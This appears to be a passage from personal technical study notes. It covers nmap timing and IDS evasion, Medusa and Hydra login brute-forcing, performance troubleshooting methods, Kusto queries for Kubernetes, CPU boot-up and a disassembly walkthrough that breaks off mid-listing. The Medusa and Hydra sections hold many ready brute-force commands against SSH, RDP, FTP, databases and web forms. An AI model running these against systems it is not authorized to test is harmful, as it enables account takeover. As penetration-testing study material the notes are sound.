  • Extra metadata (workgroup, hostnames, OS hints)

Example:
Identifies Samba 3.x–4.x on port 445, workgroup WORKGROUP, OS Ubuntu.

nmap looks at the banners of the scanned services and uses them to determine the version of each service. If it cannot identify the version through the banner, it will try to identify the service using signature probes, but this is extremely noisy.
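
A typical invocation combining version detection with a specific port (the target IP is hypothetical):

sudo nmap -sV -p 445 10.129.2.28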


Key Option Summary

  • -Pn: skip host discovery
  • -n: disable DNS resolution
  • --disable-arp-ping: skip ARP ping
  • --packet-trace: show packets sent/received
  • --reason: explain port state classification
  • -F: fast scan (top 100 ports)

Timing

Because such settings cannot always be optimized manually (for example, in a black-box penetration test), Nmap offers six timing templates (-T <0-5>) for us to use. These values (0-5) determine the aggressiveness of our scans. This can also have negative effects if the scan is too aggressive; security systems may block us because of the network traffic produced. The default timing template, used when we have defined nothing else, is normal (-T 3).

-T 0 / -T paranoid
-T 1 / -T sneaky
-T 2 / -T polite
-T 3 / -T normal
-T 4 / -T aggressive
-T 5 / -T insane

These templates contain options that we can also set manually, some of which we have already seen. The developers chose the values for these templates based on their best results, making it easier for us to adapt our scans to the corresponding network environment. The exact options and values used by each template can be found here: https://nmap.org/book/performance-timing-templates.html

Decoys (-D)

  • Use decoy IP addresses to obfuscate the true source of the scan.
  • Example: nmap -D RND:10 <target> uses 10 random decoys along with the real IP.
  • The decoys must be routable and online from the target’s perspective.
  • Helps evade simple logging and detection mechanisms.
  • Decoys can be used with SYN, ACK, ICMP, and OS Detection scans.

Source Port Specification (--source-port)

  • Specify a different source port for the scan.
  • Example: nmap -sS -Pn -p- --source-port 53 <target>

Firewall/IDS Evasion

  • nmap provides a number of ways to evade firewalls and IDS systems, including:
  • Fragmentation of packets
  • Decoy IP addresses
  • Using different source ports
  • Randomizing the order of port scans
  • Timing options to slow down scans
  • Using different scan techniques (e.g., Xmas scan, NULL scan)

Core Takeaways

  • Nmap uses 6 port states to categorize behavior.
  • SYN scans are fast & stealthy; connect scans are accurate but noisy.
  • Filtered ports behave differently when dropped vs rejected.
  • UDP scanning is slow and ambiguous.
  • Version detection is essential for deeper enumeration.

Medusa

Medusa is a fast, massively parallel, and modular login brute-forcer designed to support a wide array of services that allow remote authentication. Its primary objective is to enable penetration testers and security professionals to assess the resilience of login systems against brute-force attacks.

Medusa’s key features include:

  • Speed and Parallelism: Utilizes multiple parallel connections to perform brute-force attacks efficiently
  • Modularity: Supports numerous authentication protocols through dedicated modules
  • Flexibility: Can target single hosts or multiple hosts from a file
  • Ease of Use: Straightforward command-line interface with clear syntax

Installation

Medusa often comes pre-installed on popular penetration testing distributions. You can verify its presence by running:

medusa -h

Installing Medusa on a Linux system is straightforward:

sudo apt-get -y update
sudo apt-get -y install medusa

Command Syntax

Medusa’s command-line interface follows this general structure:

medusa [target_options] [credential_options] -M module [module_options]

Target Options

  • -h HOST: specify a single target hostname or IP address (e.g. medusa -h 192.168.1.10 ...)
  • -H FILE: specify a file containing a list of targets (e.g. medusa -H targets.txt ...)

Credential Options

  • -u USERNAME: provide a single username (e.g. medusa -u admin ...)
  • -U FILE: provide a file containing a list of usernames (e.g. medusa -U usernames.txt ...)
  • -p PASSWORD: specify a single password (e.g. medusa -p password123 ...)
  • -P FILE: specify a file containing a list of passwords (e.g. medusa -P passwords.txt ...)
  • -e ns: check for empty passwords (n) and passwords matching the username (s) (e.g. medusa -e ns ...)

The -e option is useful for testing weak configurations:

  • -e n: Try empty passwords
  • -e s: Try passwords matching the username
  • -e ns: Try both empty and same-as-username passwords

Attack Options

  • -M MODULE: define the specific module to use for the attack (e.g. medusa -M ssh ...)
  • -m "OPTION": provide additional parameters required by the chosen module (e.g. medusa -M http -m "POST /login.php...")
  • -t TASKS: define the number of parallel login attempts to run (e.g. medusa -t 4 ...)
  • -f: fast mode, stop the attack after the first successful login on the current host
  • -F: fast mode, stop the attack after the first successful login on any host
  • -n PORT: specify a non-default port for the target service (e.g. medusa -n 2222 ...)
  • -v LEVEL: verbose output, display detailed information (0-6, higher = more verbose) (e.g. medusa -v 4 ...)

Modules

Each module in Medusa is tailored to interact with specific authentication mechanisms, allowing it to send the appropriate requests and interpret responses for successful attacks.

  • ftp (File Transfer Protocol): brute-forcing FTP login credentials, used for file transfers over a network. Example: medusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt
  • http (Hypertext Transfer Protocol): brute-forcing login forms on web applications over HTTP (GET/POST). Example: medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
  • imap (Internet Message Access Protocol): brute-forcing IMAP logins, often used to access email servers. Example: medusa -M imap -h mail.example.com -U users.txt -P passwords.txt
  • mysql (MySQL Database): brute-forcing MySQL database credentials, commonly used for web applications and databases. Example: medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
  • pop3 (Post Office Protocol 3): brute-forcing POP3 logins, typically used to retrieve emails from a mail server. Example: medusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt
  • rdp (Remote Desktop Protocol): brute-forcing RDP logins, commonly used for remote desktop access to Windows systems. Example: medusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt
  • ssh (Secure Shell): brute-forcing SSH logins, commonly used for secure remote access. Example: medusa -M ssh -h 192.168.1.100 -u root -P passwords.txt
  • svn (Subversion): brute-forcing Subversion (SVN) repositories for version control. Example: medusa -M svn -h 192.168.1.100 -u admin -P passwords.txt
  • telnet (Telnet Protocol): brute-forcing Telnet services for remote command execution on older systems. Example: medusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt
  • vnc (Virtual Network Computing): brute-forcing VNC login credentials for remote desktop access. Example: medusa -M vnc -h 192.168.1.100 -P passwords.txt
  • web-form (Web Login Forms): brute-forcing login forms on websites using HTTP POST requests. Example: medusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"

Common Usage Examples

SSH Brute-Force Attack

Target a single SSH server with username and password lists:

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

This command instructs Medusa to:

  • Target the host at 192.168.0.100
  • Use the usernames from the usernames.txt file
  • Test the passwords listed in the passwords.txt file
  • Employ the ssh module for the attack

Multiple Web Servers with Basic HTTP Authentication

Test multiple web servers concurrently:

medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET

In this case, Medusa will:

  • Iterate through the list of web servers in web_servers.txt
  • Use the usernames and passwords provided
  • Employ the http module with the GET method to attempt logins
  • Run multiple threads efficiently checking each server for weak credentials

Testing for Empty or Default Passwords

Assess whether any accounts have empty or default passwords:

medusa -h 10.0.0.5 -U usernames.txt -e ns -M ssh

This command instructs Medusa to:

  • Target the host at 10.0.0.5
  • Use the usernames from usernames.txt
  • Perform additional checks for empty passwords (-e n) and passwords matching the username (-e s)
  • Employ the ssh module, as specified by -M ssh

Medusa will try each username with an empty password and then with the password matching the username, potentially revealing accounts with weak or default configurations.

HTTP POST Form Attack

Attack a web login form using POST requests:

medusa -M http -h www.example.com -U users.txt -P passwords.txt -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^"

Custom Port SSH Attack

Target SSH on a non-standard port:

medusa -h 192.168.1.100 -n 2222 -U usernames.txt -P passwords.txt -M ssh

Fast Mode (Stop on First Success)

Stop immediately after finding valid credentials:

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -f

Use -F to stop after first success on any host when targeting multiple hosts.

Verbose Output

Get detailed information about the attack progress:

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -v 4

Higher verbosity levels (up to 6) provide more detailed output.

Parallel Tasks

Control the number of parallel login attempts:

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -t 8

Increasing the number of tasks can speed up the attack but may also increase the risk of detection or overwhelming the target service.


Core Takeaways

  • Medusa uses parallel connections to efficiently brute-force login credentials across multiple protocols
  • Target options (-h or -H) specify hosts, while credential options (-u/-U and -p/-P) specify usernames and passwords
  • The -e option allows testing for weak configurations like empty passwords or passwords matching usernames
  • Module selection (-M) determines which authentication protocol to target
  • Use -f or -F to stop after the first successful login, saving time when valid credentials are found
  • Adjust -t to control parallel threads, balancing speed against detection risk
  • Module options (-m) may be required for complex scenarios like HTTP form attacks

Hydra

Hydra is a fast network login cracker that supports numerous attack protocols. It is a versatile tool that can brute-force a wide range of services, including web applications, remote login services like SSH and FTP, and even databases.

Hydra’s popularity stems from its:

  • Speed and Efficiency: Hydra utilizes parallel connections to perform multiple login attempts simultaneously, significantly speeding up the cracking process.
  • Flexibility: Hydra supports many protocols and services, making it adaptable to various attack scenarios.
  • Ease of Use: Hydra is relatively easy to use despite its power, with a straightforward command-line interface and clear syntax.

Installation

Hydra often comes pre-installed on popular penetration testing distributions. You can verify its presence by running:

hydra -h

If Hydra is not installed or you are using a different Linux distribution, you can install it from the package repository:

sudo apt-get -y update
sudo apt-get -y install hydra

Basic Syntax

Hydra’s basic syntax is:

hydra [login_options] [password_options] [attack_options] [service_options] service://server

Login Options

| Option | Description | Example |
|---|---|---|
| -l LOGIN | Specify a single username | hydra -l admin ... |
| -L FILE | Specify a file containing a list of usernames | hydra -L usernames.txt ... |

Password Options

| Option | Description | Example |
|---|---|---|
| -p PASS | Provide a single password | hydra -p password123 ... |
| -P FILE | Provide a file containing a list of passwords | hydra -P passwords.txt ... |
| -x MIN:MAX:CHARSET | Generate passwords dynamically | hydra -x 6:8:aA1 ... |

The -x option generates passwords on-the-fly:

  • MIN:MAX specifies the password length range
  • CHARSET defines the character set to use (e.g., a for lowercase, A for uppercase, 1 for numbers)

Attack Options

| Option | Description | Example |
|---|---|---|
| -t TASKS | Define the number of parallel tasks (threads) to run, potentially speeding up the attack | hydra -t 4 ... |
| -f | Fast mode: stop the attack after the first successful login is found | hydra -f ... |
| -s PORT | Specify a non-default port for the target service | hydra -s 2222 ... |
| -v | Verbose output: display detailed information about the attack’s progress | hydra -v ... |
| -V | Very verbose output: display even more detailed information | hydra -V ... |
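As with Medusa, these options can be combined in one run. The following is an illustrative example only, with placeholder host, port, and wordlists:

# Hypothetical combined run: username/password lists, custom port, 4 threads,
# stop after the first valid login, very verbose output
hydra -L usernames.txt -P passwords.txt -s 2222 -t 4 -f -V ssh://192.168.1.100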

Hydra Services

Hydra services essentially define the specific protocols or services that Hydra can target. They enable Hydra to interact with different authentication mechanisms used by various systems, applications, and network services. Each module is designed to understand a particular protocol’s communication patterns and authentication requirements, allowing Hydra to send appropriate login requests and interpret the responses.

| Service | Protocol | Description | Example Command |
|---|---|---|---|
| ftp | File Transfer Protocol (FTP) | Used to brute-force login credentials for FTP services, commonly used to transfer files over a network | hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100 |
| ssh | Secure Shell (SSH) | Targets SSH services to brute-force credentials, commonly used for secure remote login to systems | hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100 |
| http-get | HTTP GET | Used to brute-force login credentials for HTTP web login forms using GET requests | hydra -l admin -P /path/to/password_list.txt http-get://example.com/login |
| http-post | HTTP POST | Used to brute-force login credentials for HTTP web login forms using POST requests | hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" |
| smtp | Simple Mail Transfer Protocol | Attacks email servers by brute-forcing login credentials for SMTP, commonly used to send emails | hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com |
| pop3 | Post Office Protocol (POP3) | Targets email retrieval services to brute-force credentials for POP3 login | hydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com |
| imap | Internet Message Access Protocol | Used to brute-force credentials for IMAP services, which allow users to access their email remotely | hydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com |
| rdp | Remote Desktop Protocol | Targets RDP services to brute-force credentials for remote desktop connections | hydra -l administrator -P /path/to/password_list.txt rdp://192.168.1.100 |
| telnet | Telnet | Targets Telnet services for remote terminal access | hydra -l admin -P /path/to/password_list.txt telnet://192.168.1.100 |
| mysql | MySQL | Targets MySQL database servers | hydra -l root -P /path/to/password_list.txt mysql://192.168.1.100 |
| postgres | PostgreSQL | Targets PostgreSQL database servers | hydra -l postgres -P /path/to/password_list.txt postgres://192.168.1.100 |

HTTP Form-Based Authentication

For HTTP form-based authentication, Hydra uses a specific syntax:

http-post-form "/path/to/login.php:field1=^USER^&field2=^PASS^:failure_string"
  • ^USER^ and ^PASS^ are placeholders that Hydra replaces with actual credentials
  • The failure string (after the second :) helps Hydra identify failed login attempts
  • Use F= prefix for failure strings (e.g., F=incorrect)

Example:

hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" 192.168.1.100

Password Generation (-x)

The -x option allows Hydra to generate passwords dynamically instead of using a wordlist. This is useful when you have information about password requirements.

Format: -x MIN:MAX:CHARSET

  • MIN: Minimum password length
  • MAX: Maximum password length
  • CHARSET: Character set to use
    • a = lowercase letters
    • A = uppercase letters
    • 1 = numbers
    • Custom character sets can be specified directly

Example: If you know the password is 6-8 characters with lowercase, uppercase, and numbers:

hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 rdp://192.168.1.100

This command instructs Hydra to:

  • Use the username “administrator”
  • Generate and test passwords ranging from 6 to 8 characters
  • Use the specified character set (lowercase, uppercase, numbers)
  • Target the RDP service on 192.168.1.100

Hydra will generate and test all possible password combinations within the specified parameters.


Common Usage Examples

SSH Brute Force

hydra -l root -P /path/to/passwords.txt -t 4 ssh://192.168.1.100

FTP Brute Force with Username List

hydra -L usernames.txt -P passwords.txt ftp://192.168.1.100

HTTP POST Form Attack

hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" 192.168.1.100

RDP with Password Generation

hydra -l administrator -x 6:8:aA1 rdp://192.168.1.100

SSH on Non-Default Port

hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

Stop After First Success

hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Verbose Output for Debugging

hydra -l admin -P passwords.txt -v ssh://192.168.1.100

Core Takeaways

  • Hydra uses parallel connections to speed up brute-force attacks significantly.
  • Login options (-l or -L) specify usernames, while password options (-p, -P, or -x) specify passwords.
  • The -x option allows dynamic password generation based on length and character set requirements.
  • HTTP form attacks require specific syntax with ^USER^ and ^PASS^ placeholders.
  • Use -f to stop after the first successful login, and -v/-V for detailed output.
  • Adjust -t to control parallel threads, balancing speed against detection risk.

Troubleshooting

Directory Map

Performance Mantras

This is a tuning methodology that shows how best to improve performance, listing actionable items in order from most to least effective.

  1. Don’t do it. (Eliminate unnecessary work)
  2. Do it, but don’t do it again. (caching)
  3. Do it less. (tune refreshes, polling, or updates to be less frequent)
  4. Do it later. (Write-back caching)
  5. Do it when they’re not looking. (schedule work to run off-peak hours)
  6. Do it concurrently. (switch from single to multi-threaded)
  7. Do it more cheaply. (buy faster hardware)

Credits to Scott Emmons @ Netflix

The Problem Statement

Defining the problem statement is a routine task completed as a first step when starting an investigation.

It can be characterised by answering the following questions:

  1. What makes you think there is a performance problem?
  2. Has this system ever performed well?
  3. What changed recently? Software? Hardware? Load?
  4. Can the problem be expressed in terms of latency or runtime?
  5. Does the problem affect everyone or a subset of users?
  6. What is the environment? What software and hardware are used? Versions? Configuration?

RED Method

The focus of the RED method is services; typically, cloud services in a microservices architecture.

It can be summarized as: for every service, check the request rate, errors, and duration of requests (a rough shell sketch follows the metric list below).

The metrics to check are:

  1. Request rate: The number of requests per second
  2. Errors: The number of requests that failed
  3. Duration: The time it takes for requests to complete
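As a rough sketch (not a standard tooling recipe), the three metrics can be approximated from an nginx access log. This assumes the combined log format with $request_time appended as the last field, and that the sampled lines cover roughly the stated window; log path and window size are assumptions:

# Approximate RED metrics from an nginx access log.
WINDOW=60
tail -n 5000 /var/log/nginx/access.log | awk -v window="$WINDOW" '
  { reqs++; dur += $NF }     # count every request and sum its duration (last field)
  $9 ~ /^5/ { errs++ }       # 9th field is the HTTP status code; count 5xx as errors
  END {
    if (reqs > 0)
      printf "rate: %.2f req/s  errors: %d  avg duration: %.3fs\n",
             reqs / window, errs, dur / reqs
  }'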

USE Method

The utilization, saturation, and errors method should be used early in a performance investigation to identify systemic bottlenecks. It can be summarized as:

  1. For every resource, check utilization, saturation, and errors.

Steps

  1. The first step is to list the resources involved: CPUs, RAM, NICs, storage devices, accelerators (GPUs, TPUs, etc.), controllers (storage, network), and interconnects
  2. Once you have a list of resources, consider the metric types available for each: utilization, saturation, and errors (see the sketch below)
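A minimal first-pass sketch of USE checks on a Linux host, assuming the sysstat tools (mpstat, iostat, sar) are installed:

# Utilization
mpstat -P ALL 1 3        # per-CPU utilization
free -m                  # memory used vs. available
iostat -xz 1 3           # per-disk utilization and latency
sar -n DEV 1 3           # NIC throughput

# Saturation
vmstat 1 3               # r = run-queue length, si/so = swap-in/out
iostat -xz 1 3           # request queue size per device

# Errors
dmesg --level=err,warn | tail   # recent kernel errors/warnings
ip -s link                      # per-interface RX/TX error counters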

Linux

Directory Map

Troubleshooting Memory

File System Paging

File system paging is caused by the reading and writing of pages in memory-mapped files. When needed, the kernel can free memory by paging some of them out. If a file system page has been modified in main memory (called dirty), the page-out requires it to be written to disk. If, instead, the file system page has not been modified (called clean), the page-out simply frees the memory for immediate reuse, since a copy already exists on disk.

Anonymous Paging (swapping)

Anonymous paging involves data that is private to a process; the process heap and stack. It is termed anonymous because it has no named location in the operating system. Anonymous page-outs require moving data to the physical swap locations or swap files. Linux uses the term swapping for this type of paging. Anonymous paging hurts performance and has therefore been referred to as ‘bad paging’. When applications access memory pages that have been paged out, they block on the disk I/O required to read them back to main memory. This is called ‘anonymous page-in’, which introduces latency to applications.

How the operating system deals with memory saturation (quick checks for each are sketched after this list):

  • Paging
  • Reaping
  • OOM killer
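A quick way to see which of these mechanisms has been active on a Linux host (a sketch using standard tools; exact output varies by distribution):

vmstat 1 5                                # si/so columns: pages swapped in/out per second
swapon --show                             # configured swap devices and how full they are
grep -E 'Dirty|Writeback' /proc/meminfo   # dirty file system pages awaiting write-back
dmesg -T | grep -i 'out of memory'        # evidence of the OOM killer firing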

Working Set Size

  • Working Set Size (WSS) is the amount of main memory a process frequently uses to perform work. It is a useful concept for memory performance tuning. Performance should greatly improve if the WSS can fit in the CPU caches rather than main memory, and it will degrade if the WSS exceeds the amount of main memory, since the shortfall must be made up by swapping.

Memory Hardware

  • RAM (Main Memory): Dynamic RAM (DRAM) provides high-density storage; each bit is implemented as a capacitor and a transistor and requires a constant refresh to maintain its charge. The access time of RAM can be measured as the column address strobe (CAS) latency: the time between sending the memory module the desired address and the data being available to read. For DDR4 it is around 10-20 nanoseconds.

  • CPU caches

    • Level 1: Usually split into separate instruction and data caches
    • Level 2: A cache for both instructions and data
    • Level 3: Another larger level of cache

MMU (Memory Management Unit)

  • The MMU is responsible for virtual-to-physical address translations. These are performed per page, and offsets within a page are mapped directly.

TLB (Translation Lookaside Buffer)

  • The TLB is used by the MMU as the first level of address-translation cache, followed by the page table in main memory (see the perf example below).
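To get a rough sense of TLB behaviour for a workload, perf can count TLB events on CPUs that expose them; event names vary by architecture, and ./your_program below is a placeholder for the workload under test:

# Count data-TLB loads and misses for a command (assumes a Linux x86_64 box
# where the generic dTLB events are available)
perf stat -e dTLB-loads,dTLB-load-misses ./your_program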

Tools

  • vmstat
  • swapon
  • sar
  • slabtop
  • numastat
  • ps
  • top / htop
  • pmap
  • perf
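A few of the tools above in action for per-process memory; <PID> is a placeholder:

ps -eo pid,comm,rss,vsz --sort=-rss | head   # processes ranked by resident set size (KB)
pmap -x <PID> | tail -n 1                    # total mapped size, RSS, and dirty memory for one process
top -o %MEM                                  # interactive view sorted by memory usage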

Troubleshooting Playbook

Directory Map

Troubleshooting 503s for Apps in Kubernetes

Get the precise time of the 503 occurrences

let start = todatetime('2023-11-07T04:25:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
nginxAccessLogs
| where time_iso8601 between (start .. end)
| where host endswith ".aprimo.com"
| where status == 503
| where request_uri has '/api/ui/unauth-init'
| make-series count() default = 0 on time_iso8601 from start to end step 1s by host
| render timechart

Check if there were any pods running during the incident:

let start = todatetime('2023-11-07T04:00:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
let nameprefix = "pod name prefix";
KubePodInventory
| where TimeGenerated between (start .. end)
| where Name contains nameprefix
| make-series count() default = 0 on TimeGenerated from start to end step 1m by PodStatus
| render timechart

General troubleshooting/notes

Get pod names running in a replica set at a given time

let start = todatetime('2023-11-07T04:00:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
let nameprefix = "pod name prefix";
KubePodInventory
| where TimeGenerated between (start .. end)
| where Name startswith nameprefix
| distinct Name

Get node names running during a given time duration:

let start = todatetime('2023-11-07T04:00:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
let nameprefix = "aksnpwin8";
KubeNodeInventory
| where TimeGenerated between (start .. end)
| where Computer startswith nameprefix

Get CPU Utilization Avg Per Microservice

let _ResourceLimitCounterName = 'cpuLimitNanoCores';
let _ResourceUsageCounterName = 'cpuUsageNanoCores';
let _BinSize = 1h;
KubePodInventory
| where Namespace in ('dam-c000', 'pm-r01')
| extend
    InstanceName = strcat(ClusterId, '/', ContainerName),
    ContainerName = strcat(ControllerName, '/', tostring(split(ContainerName, '/')[1]))
| distinct Computer, InstanceName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceLimitCounterName
    | summarize MaxLimitValue = max(CounterValue) by Computer, InstanceName, bin(TimeGenerated, _BinSize)
    | project
        Computer,
        InstanceName,
        MaxLimitValue
    )
    on Computer, InstanceName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceUsageCounterName
    | project Computer, InstanceName, UsageValue = CounterValue, TimeGenerated
    )
    on Computer, InstanceName
| project
    ContainerName = tostring(split(InstanceName, '/')[10]),
    Computer,
    TimeGenerated,
    UsagePercent = UsageValue * 100.0 / MaxLimitValue
| summarize AvgCPUUsagePercentage = avg(UsagePercent) by bin(TimeGenerated, 1h), ContainerName
| render timechart;

Get Memory Utilization Avg per Microservice

let _ResourceLimitCounterName = 'memoryLimitBytes';
let _ResourceUsageCounterName = 'memoryWorkingSetBytes';
KubePodInventory
| where Namespace in ('dam-c000', 'pm-r01')
| extend InstanceName = strcat(ClusterId, '/', ContainerName),
    ContainerName = strcat(ControllerName, '/', tostring(split(ContainerName, '/')[1]))
| distinct Computer, InstanceName, ContainerName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceLimitCounterName
    | summarize MaxLimitValue = max(CounterValue) by Computer, InstanceName, bin(TimeGenerated, 1h)
    | project
        Computer,
        InstanceName,
        MaxLimitValue
    )
    on Computer, InstanceName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceUsageCounterName
    | project Computer, InstanceName, UsageValue = CounterValue, TimeGenerated
    )
    on Computer, InstanceName
| project
    AppName = tostring(split(InstanceName, '/')[10]),
    Computer,
    TimeGenerated,
    UsagePercent = UsageValue * 100.0 / MaxLimitValue
| summarize MemoryUsagePercentage = avg(UsagePercent) by bin(TimeGenerated, 1h), AppName
| render timechart;

What Happens When…

Directory Map

What happens when a CPU starts?

  • When a CPU receives power, it is reset by a pulse on its RESET (or RST) pin. This is necessary because while the power supply is ramping up, even if that only takes a second or two, the CPU receives “dirty” power that has not yet settled at a stable voltage. Digital logic chips like CPUs require precise voltages and misbehave if they receive something outside their intended range, which is why the CPU must be reset immediately after powering up. The reset pin must be held active for a certain number of clock cycles to fully reset the CPU.

  • After being reset, the CPU can get to work. The CPU gets some instructions from memory in what is known as a ‘fetch’ cycle. Memory can be either RAM or ROM. RAM is like the CPU’s workbench, while ROM stores read-only code that controls the system itself. The CPU always fetches code from ROM first so that it knows what its job is. The CPU addresses memory (both RAM and ROM) through the address bus; it has two buses, the address bus and the data bus. The memory responds to the request on the address bus by sending the contents of the selected memory address back to the CPU over the data bus.

  • Every CPU has a particular point in memory where it begins reading instructions after it has been reset. Some CPUs jump to a fixed memory address and begin executing the code there. Others have a ‘reset vector’: they first read a particular location in memory to obtain the address at which to begin executing instructions.

  • The CPU contains a register (a small piece of extremely fast internal storage) called the instruction pointer, which holds a number: the memory address of the next instruction to be executed. The IP is incremented with each instruction, and in the event of a jump (JMP) instruction, which tells the CPU to jump to another location and start running the instructions there, the IP is set to the jump target and the CPU continues on its way from there. The CPU’s instructions are sometimes called “opcodes”. They are simply strings of binary 1s and 0s which together form an instruction. For example, on a standard Intel 80x86 CPU (such as a 486 or Pentium), the opcode 90h (or 10010000 binary) is a NOP (no operation) opcode. NOP is the simplest instruction in any CPU: it means do nothing and go on to the next instruction. If a cell in RAM or ROM contains this opcode and the CPU executes it, it will perform a NOP (in other words, it will do nothing) and the IP will be set to the next memory cell. (On some computer platforms, the instruction pointer is called the “program counter”, abbreviated “PC”. However, on the PC (as in “IBM PC”) platform, the term “instruction pointer” is usually used, because that term is preferred by Intel with regard to its 80x86 CPU family.)

  • Regardless of where the CPU begins getting its instructions, the beginning point should always be somewhere in a ROM chip. The computer needs startup instructions to perform basic hardware checking and preparation (POST), and these are contained in a ROM chip on the motherboard called the BIOS. This is where any computer begins executing its code when it is turned on.

  • Once the BIOS code has been executed, what happens next depends entirely on what is in the BIOS, although normally the BIOS will begin looking for a disk drive of some kind and start executing the instructions there (which is usually an operating system). From that point onward, the OS takes over and usually runs a shell which the user then uses to operate the computer.

Fun Stuff

Modifying Machine Code in Executables

Requires xxd and objdump.

We have a very simple program written in C that prints “ab” followed by a newline:

#include <stdio.h>

int main() {
  putchar('a');
  putchar('b');
  putchar('\n');
}

Compile it:

gcc -o main main.c

Now, let’s look at the machine code of the compiled executable using objdump:

λ workspace $ objdump -d main

main:     file format elf64-x86-64


Disassembly of section .init:

0000000000001000 <_init>:
    1000:       f3 0f 1e fa             endbr64
    1004:       48 83 ec 08             sub    $0x8,%rsp
    1008:       48 8b 05 c1 2f 00 00    mov    0x2fc1(%rip),%rax        # 3fd0 <__gmon_start__@Base>
    100f:       48 85 c0                test   %rax,%rax
    1012:       74 02                   je     1016 <_init+0x16>
    1014:       ff d0                   call   *%rax
    1016:       48 83 c4 08             add    $0x8,%rsp
    101a:       c3                      ret

Disassembly of section .plt:

0000000000001020 <putchar@plt-0x10>:
    1020:       ff 35 ca 2f 00 00       push   0x2fca(%rip)        # 3ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
    1026:       ff 25 cc 2f 00 00       jmp    *0x2fcc(%rip)        # 3ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
    102c:       0f 1f 40 00             nopl   0x0(%rax)

0000000000001030 <putchar@plt>:
    1030:       ff 25 ca 2f 00 00       jmp    *0x2fca(%rip)        # 4000 <putchar@GLIBC_2.2.5>
    1036:       68 00 00 00 00          push   $0x0
    103b:       e9 e0 ff ff ff          jmp    1020 <_init+0x20>

Disassembly of section .text:

0000000000001040 <_start>:
    1040:       f3 0f 1e fa             endbr64
    1044:       31 ed                   xor    %ebp,%ebp
    1046:       49 89 d1                mov    %rdx,%r9
    1049:       5e                      pop    %rsi
    104a:       48 89 e2                mov    %rsp,%rdx
    104d:       48 83 e4 f0             and    $0xfffffffffffffff0,%rsp
    1051:       50                      push   %rax
    1052:       54                      push   %rsp
    1053:       45 31 c0                xor    %r8d,%r8d
    1056:       31 c9                   xor    %ecx,%ecx
    1058:       48 8d 3d da 00 00 00    lea    0xda(%rip),%rdi        # 1139 <main>
    105f:       ff 15 5b 2f 00 00       call   *0x2f5b(%rip)        # 3fc0 <__libc_start_main@GLIBC_2.34>
    1065:       f4                      hlt
    1066:       66 2e 0f 1f 84 00 00    cs nopw 0x0(%rax,%rax,1)
    106d:       00 00 00
    1070:       48 8d 3d a1 2f 00 00    lea    0x2fa1(%rip),%rdi        # 4018 <__TMC_END__>
    1077:       48 8d 05 9a 2f 00 00    lea    0x2f9a(%rip),%rax        # 4018 <__TMC_END__>
    107e:       48 39 f8                cmp    %rdi,%rax
    1081:       74 15                   je     1098 <_start+0x58>
    1083:       48 8b 05 3e 2f 00 00    mov    0x2f3e(%rip),%rax        # 3fc8 <_ITM_deregisterTMCloneTable@Base>
    108a:       48 85 c0                test   %rax,%rax
    108d:       74 09                   je     1098 <_start+0x58>
    108f:       ff e0                   jmp    *%rax
    1091:       0f 1f 80 00 00 00 00    nopl   0x0(%rax)
    1098:       c3                      ret
    1099:       0f 1f 80 00 00 00 00    nopl   0x0(%rax)
    10a0:       48 8d 3d 71 2f 00 00    lea    0x2f71(%rip),%rdi        # 4018 <__TMC_END__>
    10a7:       48 8d 35 6a 2f 00 00    lea    0x2f6a(%rip),%rsi        # 4018 <__TMC_END__>
    10ae:       48 29 fe                sub    %rdi,%rsi
    10b1:       48 89 f0                mov    %rsi,%rax
    10b4:       48 c1 ee 3f             shr    $0x3f,%rsi
    10b8:       48 c1 f8 03             sar    $0x3,%rax
    10bc:       48 01 c6                add    %rax,%rsi
    10bf:       48 d1 fe                sar    $1,%rsi
    10c2:       74 14                   je     10d8 <_start+0x98>
    10c4:       48 8b 05 0d 2f 00 00    mov    0x2f0d(%rip),%rax        # 3fd8 <_ITM_registerTMCloneTable@Base>
    10cb:       48 85 c0                test   %rax,%rax
    10ce:       74 08                   je     10d8 <_start+0x98>
    10d0:       ff e0                   jmp    *%rax
    10d2:       66 0f 1f 44 00 00       nopw   0x0(%rax,%rax,1)
    10d8:       c3                      ret
    10d9:       0f 1f 80 00 00 00 00    nopl   0x0(%rax)
    10e0:       f3 0f 1e fa             endbr64
